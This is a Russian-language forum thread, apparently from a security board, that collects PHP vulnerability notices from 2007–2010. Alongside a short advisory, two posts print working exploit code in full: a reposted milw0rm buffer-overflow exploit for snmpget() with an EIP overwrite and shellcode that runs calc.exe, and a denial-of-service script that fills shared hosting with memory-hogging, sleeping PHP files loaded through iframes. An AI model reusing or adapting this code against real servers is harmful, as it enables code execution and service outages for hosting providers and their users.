PHP версии до 5.2.3.
Опасность: Средняя
Наличие эксплоита: Нет
Описание:
Обнаруженные уязвимости позволяют удаленному пользователю повысить свои привилегии на системе.
1. Целочисленное переполнение обнаружено в функции "chunk_split()".
2. Уязвимость существует из-за ошибки в функции "realpath()". Злоумышлении может обойти ограничения "open_basedir" и определить наличие файлов на системе.
URL производителя: www.php.net
Решение: Установите последнюю версию 5.2.3 с сайта производителя.
Друзья: Всё для вебмастера | [ Реклама на форуме ] |
0
PHP
Автор
$iD
, 04 Jun 2007 07:03
#1
Отправлено 04 June 2007 - 07:03
#2
Отправлено 21 July 2007 - 01:19
PHP <= 5.2.3 snmpget() object id local Buffer Overflow eip overwrite exploit
bug discovered by rgod
Original advisory: ]]>http://retrogod.alte..._local_bof.html]]>
exp:
©milw0rm.com
bug discovered by rgod
Original advisory: ]]>http://retrogod.alte..._local_bof.html]]>
exp:
<?php //PHP <= 5.2.3 snmpget() object id local Buffer Overflow eip overwrite exploit //bug discovered by rgod //Original advisory: http://retrogod.altervista.org/php_446_snmpget_local_bof.html //[quote="rgod"]more than 256 chars result in simple eip overwrite[/quote] //right! so here it is an exploit using eip overwrite //author: shinnai //mail: shinnai[at]autistici[dot]org //site: http://shinnai.altervista.org //Tested on xp Pro sp2 full patched if (!extension_loaded("snmp")) die("snmp extension required!"); $buffer = str_repeat("A",256); $EIP="\xFF\xBE\x3F\x7E"; //call esp from user32.dll $nop=str_repeat("\x90",8); $shellcode= //execute calc.exe "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54". "\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x54\x4e\x53\x4b\x58\x4e\x37". "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48". "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38". "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c". "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e". "\x46\x4f\x4b\x53\x46\x35\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48". "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54". "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x38". "\x41\x30\x4b\x4e\x49\x58\x4e\x35\x46\x42\x46\x50\x43\x4c\x41\x43". "\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x37". "\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x57\x4e\x31\x4d\x4a". "\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b". "\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x35\x41\x33". "\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57". "\x42\x55\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49". "\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36". "\x4e\x46\x43\x46\x50\x52\x45\x36\x4a\x37\x45\x36\x42\x30\x5a"; $egg = $buffer.$EIP.$nop.$shellcode.$nop; snmpget (1, 1, $egg); ?>
©milw0rm.com
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********
*********
icq:162295
*********
#3
Отправлено 28 May 2008 - 19:33
PHP 5.2.6 sleep() Local Memory Exhaust Exploit
Цель: PHP 5.2.6
Воздействие: Отказ в обслуживании
Цель: PHP 5.2.6
Воздействие: Отказ в обслуживании
<?php sleep(9999999); echo 'Hello World'; ?> Will print hello world after 9999999 seconds... so max_execution_time simply dosnt work :P Why? we can find in manual: "max_execution_time only affect the execution time of the script itself. Any time spent on activity that happens outside the execution of the script such as system calls using system(), stream operations, database queries, etc. is not included when determining the maximum time that the script has been running." including sleep() :P We can use this vuln to run out memory on web/php hosting: <?php if (!file_exists('./temp')) (@mkdir("/temp", 0777))? $temp='temp/': $temp=''; else $temp='temp/'; for($n=0;$n<128;$n++) { $rand = mt_rand(); $fp = fopen("$temp$rand.php", 'w+'); fwrite($fp, '<?php while(memory_get_usage()<16000000) $a.=\'X\'; sleep(999999999); ?>');// for 16mb memory limit fclose($fp); echo "<iframe src=\"$temp$rand.php\" name=$n width=\"10\" height=\"10\"></iframe>"; } ?>
Ссылки из под хайдов не выдаю!
#4
Отправлено 23 November 2008 - 20:06
#6
Отправлено 03 January 2009 - 09:35
PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability
#8
Отправлено 03 August 2010 - 19:39
Ссылки из под хайдов не выдаю!
Количество пользователей, читающих эту тему: 0
0 пользователей, 0 гостей, 0 анонимных